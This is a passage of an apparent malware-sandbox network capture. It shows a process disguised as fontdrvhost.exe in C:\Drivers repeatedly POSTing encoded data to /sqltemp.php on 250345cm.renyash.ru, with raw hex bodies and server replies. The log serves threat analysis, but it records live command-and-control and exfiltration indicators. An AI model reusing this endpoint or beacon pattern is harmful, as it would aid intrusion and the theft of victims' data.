                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8577&min_rtt=2493&rtt_var=13103&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=28533&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            123192.168.2.450126104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:34.481085062 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:34.839864969 CET1012OUTData Raw: 56 50 5f 55 54 5f 54 55 58 56 52 59 56 5d 59 5e 5b 52 54 59 55 55 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VP_UT_TUXVRYV]Y^[RTYUUPZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3?-\ %^3X;C,7[?()(*.$\ 2(+@2.&Y.,Y-1
                                                                                                                                                                                            Jan 1, 2025 14:53:34.944031000 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:35.199927092 CET810INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:35 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0b5ClDH4o7vtoqq3zzxrplJWWrMD3sp%2Bf3d1zq6bE8hzWf99UiKDPDCr%2Bubh6eeNfdUC2bq%2FaIhv6ZY8wa5zmusTp%2BJHQoLpfM3Nk4iEYzaEn%2BpRhkMrw%2FFWcJACvJH8GeSWZIWP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff1119fd4261-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3816&min_rtt=1615&rtt_var=5009&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=75930&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            124192.168.2.450132104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:35.322820902 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:35.668483019 CET1012OUTData Raw: 53 53 5f 53 54 59 54 51 58 56 52 59 56 50 59 50 5b 5a 54 5d 55 5f 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SS_STYTQXVRYVPYP[ZT]U_PXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3/"?)^3?;)"#>8Z('=<\71+Y<%&,?S,:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:35.767045975 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:35.946017981 CET815INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:35 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xfo9X%2Bnu5oLRBDnlZGw8KcUiqDY9B%2BrV39%2FG39mIkW8F0%2B2jhNLSiwqQ2VSE8Y8xiImg37ww%2BAgxqyieXg60p4XzBL9wFSCDoo7%2FfiqPtTZ7LjWCqaLDmOGoyu%2FNG3M2F9Es%2BQXT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff1648587287-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8351&min_rtt=2046&rtt_var=13378&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=27815&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            125192.168.2.450138104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:36.079335928 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:36.433725119 CET1012OUTData Raw: 53 52 5f 57 54 5e 54 5d 58 56 52 59 56 50 59 56 5b 5a 54 5b 55 54 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SR_WT^T]XVRYVPYV[ZT[UTP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z'>#?]0=7B/)9V!=/*)#S*= [!27()1/;S:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:36.524014950 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:36.697197914 CET803INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:36 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6nRMoB8kP8hVPlN1Hsygdpw9iY01uQLDbH1%2BtATbAjzLe2GjqceP5I3VMcNnuyY1FdZuwrzPC8%2BzUUYVUFqBkBORcWoyBFClh17hWFoLSytQg2Lsaf5orJA8oj6NYjbpxhFBhIvR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff1aff57423b-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2799&min_rtt=1725&rtt_var=2796&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=141431&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            126192.168.2.450139104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:36.824229002 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:37.183700085 CET1012OUTData Raw: 56 51 5a 50 54 59 54 53 58 56 52 59 56 58 59 56 5b 59 54 59 55 55 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQZPTYTSXVRYVXYV[YTYUUP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.^'%Y ,=_$.#,:>#.8Z(#(.?4 <6&/9*&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:53:37.291965008 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:37.543256044 CET805INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:37 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=akXNpMCIqqfLtLc66D75k7fJykdFOusH8z9D5E%2FJIHQ13RSrAuycAo6yJaFmI81J%2F%2FNMWC6R7Juzwt590KseJLseOH7XF8BzyrhAUC0Gj7uMXXledWrli8HcFn6IdsajslMNZgxJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff1fcd740c90-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=9694&min_rtt=4455&rtt_var=12149&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=31485&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            127192.168.2.450140104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:37.668204069 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:38.027390957 CET1012OUTData Raw: 53 57 5f 55 51 5c 54 57 58 56 52 59 56 51 59 57 5b 5c 54 5e 55 54 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SW_UQ\TWXVRYVQYW[\T^UTP^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Y$/7/.'$/4.<[()7V)$!2<8"1/7-&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:38.160312891 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:38.423739910 CET814INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:38 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w4%2FJo%2BcPn6ImzgzqV8%2B8aYd1LzdOlD9%2BVgeHM%2FZdDXhtYsw6Ena4vWuKDKxsd8JYsXMHpHNEGwDbrhyJsDyKxdlCgXaMojgRrjxIjeleU%2FEYikJp%2BwU4eTQ6%2BJjXJhKxknnLRmYX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff25387d9e16-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4039&min_rtt=1974&rtt_var=4871&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=78927&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            128192.168.2.450141104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:38.564229965 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:38.919564962 CET1012OUTData Raw: 53 52 5f 51 54 5c 51 52 58 56 52 59 56 5a 59 50 5b 5a 54 5f 55 54 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SR_QT\QRXVRYVZYP[ZT_UTP[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z3/-#/$.;D.:.78<9<=.+#7Z?+@1/'-:&Y.,Y--
                                                                                                                                                                                            Jan 1, 2025 14:53:39.037833929 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            129192.168.2.450142104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:39.159049034 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1812
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:39.511763096 CET1812OUTData Raw: 53 52 5f 50 54 5b 51 51 58 56 52 59 56 59 59 50 5b 5e 54 51 55 59 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SR_PT[QQXVRYVYYP[^TQUYP^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.0<940>(,\=R4-Z((=-' 7Y<]"%Y#V:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:39.637530088 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:39.806339025 CET956INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:39 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9du6hKP6GzFJN9olwwC%2FeD7XemDnrBhNflwQr2AK%2FPQ3pqQXeDUuuUgbzmg%2B0wysILowg9oAe4G4MCQRGOG7fwjHzxk0KQhlxRjuE4VFjaSPjF8J5WX%2FLJA8IRvhPxx0dmjBAVde"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff2e687c7d0b-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3439&min_rtt=1980&rtt_var=3661&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2131&delivery_rate=106928&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 25 1f 2a 13 31 09 31 31 38 59 3c 13 3b 1d 32 3d 22 11 3c 38 26 17 27 58 38 01 29 39 2b 1e 22 12 3e 06 31 28 24 10 37 03 01 12 24 34 2b 59 05 1c 20 45 22 2f 2f 00 28 2d 3b 5c 31 06 31 5d 33 2d 28 5c 28 16 02 1c 20 05 01 13 30 5b 3f 00 3d 04 2c 54 27 05 3c 05 3a 2f 07 53 27 10 2c 54 00 11 26 56 33 1f 3f 04 23 0e 20 5a 21 08 3d 13 24 27 29 0e 24 3c 0e 09 23 5f 3a 5d 32 0c 0e 01 36 33 25 03 31 3b 04 02 37 5b 23 52 3d 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98%*1118Y<;2="<8&'X8)9+">1($7$4+Y E"//(-;\11]3-(\( 0[?=,T'<:/S',T&V3?# Z!=$')$<#_:]263%1;7[#R=>%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            130192.168.2.450143104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:39.295392990 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:39.652348042 CET1012OUTData Raw: 53 52 5a 54 54 51 54 5d 58 56 52 59 56 5b 59 5e 5b 5a 54 50 55 54 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SRZTTQT]XVRYV[Y^[ZTPUTP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'!7<23>;D;7[?7(>$ (+;!28.&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:53:39.749337912 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:39.922985077 CET807INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:39 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wk%2BhMbyvq0ZExj7ib98F9iJkg1TXJ3teKNYJRxYRddB90ROR42G2K7jkAsTpmcmn9RS611Zy%2FHcLW8SceMj2yztbaZYu6KOb9LYJ7a%2Bs4QBSH1eTPpJff%2BoFe9FYu9mYdL2mRktg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff2f2f940f83-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8265&min_rtt=1481&rtt_var=14124&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=26185&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            131192.168.2.450144104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:40.043499947 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:40.403585911 CET1012OUTData Raw: 56 53 5f 57 54 5d 54 50 58 56 52 59 56 5b 59 54 5b 53 54 5d 55 5c 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VS_WT]TPXVRYV[YT[ST]U\PUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z'9#Y&'.4/1V [?('W>>4]#!(<A%??,:&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:53:40.491209030 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:40.662498951 CET809INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:40 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
